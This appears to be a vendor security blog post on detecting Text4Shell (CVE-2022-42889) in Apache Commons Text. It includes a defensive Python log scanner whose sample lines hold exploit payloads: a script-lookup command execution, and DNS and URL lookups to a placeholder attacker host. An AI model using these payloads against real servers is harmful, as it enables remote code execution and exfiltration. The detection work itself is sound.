Detecting Text4Shell (CVE-2022-42889), Critical RCE in Apache Commons Text

October 20, 2022 · 4 min read

Threat actors don’t sleep, and neither can cyber defenders if they want to keep up with emerging threats. In 2022, a wave of critical “shell” vulnerabilities has flooded the cyber threat arena: Log4Shell at the turn of the year, Spring4Shell in March, and ProxyNotShell just one month ago. In October, a new critical remote code execution (RCE) vulnerability in Apache Commons Text entered the scene, tracked as CVE-2022-42889 and dubbed Text4Shell.

Text4Shell Detection

Referred to as the next Log4Shell, CVE-2022-42889 poses a risk of large-scale in-the-wild exploitation. To protect your organization’s infrastructure and detect potentially malicious activity at the earliest attack stages, explore the set of Sigma rules developed by the SOC Prime Team and our Threat Bounty authors.

The detections are compatible with 18 SIEM, EDR, and XDR technologies and are aligned with the MITRE ATT&CK® framework, addressing the Initial Access and Lateral Movement tactics, with Exploit Public-Facing Application (T1190) and Exploitation of Remote Services (T1210) as the corresponding techniques.

Become a member of our Threat Bounty Program to monetize your Detection Engineering skills while sharpening your Sigma and ATT&CK knowledge. Imagine the code you wrote helps to detect emerging cyber attacks or prevent a power grid outage. Published to the world’s largest threat detection marketplace and explored by 30,000+ cybersecurity professionals, your detection content helps make the world a safer place while proving your expertise and granting recurrent financial benefits. 

Press the Explore Detections button to instantly access Sigma rules for CVE-2022-42889, corresponding CTI links, ATT&CK references, and threat hunting ideas.


CVE-2022-42889 Description

Cybersecurity researchers have disclosed a new vulnerability in Apache Commons Text, a low-level library for working with strings. The flaw, tracked as CVE-2022-42889 and known as Text4Shell, lies in the default interpolator of the StringSubstitutor class and enables unauthenticated threat actors to achieve remote code execution on servers running applications that pass untrusted input to the vulnerable library.

Apache Commons Text is an open-source library for performing a range of text operations; the Apache Software Foundation (ASF) describes it as providing additions to the text handling of the standard Java Development Kit (JDK). Because the library is widely used as a dependency, a critical RCE flaw in it poses a threat to a wide range of organizations worldwide that rely on software built on top of it. With a CVSS score of 9.8, CVE-2022-42889 raised concerns among Apache Commons Text users, who compared it to the notorious CVE-2021-44228, aka Log4Shell. However, most cybersecurity experts suggest its impact is far smaller: exploitation requires an application to hand attacker-controlled input to the StringSubstitutor interpolator, whereas Log4Shell was reachable through ordinary log messages.

The security flaw affects Apache Commons Text versions 1.5 (released in 2018) through 1.9. A PoC for CVE-2022-42889 has already been released; however, at the time of writing there are no known cases of exploitation in the wild.

The ASF released the fixed Apache Commons Text version at the end of September and published the advisory describing the flaw and its remediation about two weeks later, on October 13. According to the advisory, CVE-2022-42889 is triggered during the variable interpolation the library performs: in versions 1.5 through 1.9, the set of default Lookup instances includes interpolators such as “script”, “dns”, and “url” that can lead to arbitrary code execution or contact with attacker-controlled servers. Cybersecurity researchers also note that individuals and organizations running Java 15 and later are likely out of reach of the script vector, because the Nashorn JavaScript engine that the “script” lookup relies on was removed in JDK 15 (unless a scripting engine is supplied separately); however, the “dns” and “url” lookups remain usable for DNS-based exfiltration and server-side requests, so exploitation is still possible through those vectors.
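Because exploitation attempts have to reach the interpolator through application input, a practical first detection is to look for the dangerous lookup prefixes named above in web server access logs. The following is an added example (not SOC Prime’s Sigma content and not code from the Apache project) that normalizes URL-encoding, including double encoding, and flags only the “script”, “dns”, and “url” lookups while leaving benign lookups such as “sys” alone. The log lines are constructed for illustration; the hostname attacker.example is a placeholder.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Lookup prefixes the Apache Commons Text advisory names as dangerous
# in versions 1.5 through 1.9: script (code execution), dns, and url.
DANGEROUS_LOOKUPS = ("script", "dns", "url")

# "${" optionally padded with whitespace, then one of the prefixes and a colon.
_PATTERN = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)


def normalize(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL-encoding.

    Payloads usually arrive in query strings or form bodies and are often
    double-encoded to slip past naive substring matching on "${script:".
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_text4shell_lookups(text: str) -> List[str]:
    """Return the lowercase names of dangerous lookups found in an untrusted string."""
    return [m.group(1).lower() for m in _PATTERN.finditer(normalize(text))]


def scan_access_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line_number, lookups) for every access-log line carrying a dangerous interpolation."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = find_text4shell_lookups(line)
        if found:
            hits.append((number, found))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    # 1: ordinary request, must not be flagged
    '10.0.0.5 - - [20/Oct/2022:10:01:02 +0000] "GET /search?q=commons HTTP/1.1" 200 512',
    # 2: URL-encoded ${script:javascript:java.lang.Runtime.getRuntime().exec('id')}
    '10.0.0.9 - - [20/Oct/2022:10:01:07 +0000] "GET /search?q=%24%7Bscript%3Ajavascript%3A'
    'java.lang.Runtime.getRuntime%28%29.exec%28%27id%27%29%7D HTTP/1.1" 500 0',
    # 3: plain DNS lookup used as an out-of-band exfiltration probe
    '10.0.0.9 - - [20/Oct/2022:10:01:09 +0000] "GET /api?name=${dns:address:attacker.example} HTTP/1.1" 200 17',
    # 4: double-encoded ${url:http://attacker.example/x}
    '10.0.0.9 - - [20/Oct/2022:10:01:12 +0000] "GET /lookup?host=%2524%257Burl%253Ahttp%253A%252F%252F'
    'attacker.example%252Fx%257D HTTP/1.1" 500 0',
    # 5: a harmless lookup that the advisory does not list, must not be flagged
    '10.0.0.5 - - [20/Oct/2022:10:01:15 +0000] "GET /render?tpl=${sys:user.home} HTTP/1.1" 200 64',
]


if __name__ == "__main__":
    for number, lookups in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: suspicious lookup(s) {lookups}")
```

A match is a hunting lead rather than proof of compromise: the application must actually route that parameter into StringSubstitutor.createInterpolator() for the request to do anything, so pair this with inventory data on which services bundle commons-text 1.5 through 1.9.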

As the CVE-2022-42889 mitigation, cyber defenders recommend upgrading any potentially vulnerable instances of the library to version 1.10.0, whose default configuration disables the script, dns, and url interpolators. Where an upgrade cannot be applied immediately, avoid passing untrusted input to StringSubstitutor.createInterpolator(), or build the substitutor with an explicit allow-list of lookups instead of the full default set.

Boost your threat detection capabilities and accelerate threat hunting velocity equipped with Sigma, MITRE ATT&CK, and Detection as Code to always have curated detection algorithms against any adversary TTP or any exploitable vulnerability at hand. Obtain 800 rules for existing CVEs to proactively defend against threats that matter most. Instantly reach 140+ Sigma rules for free or get all relevant detection algorithms with On Demand at https://my.socprime.com/pricing/.
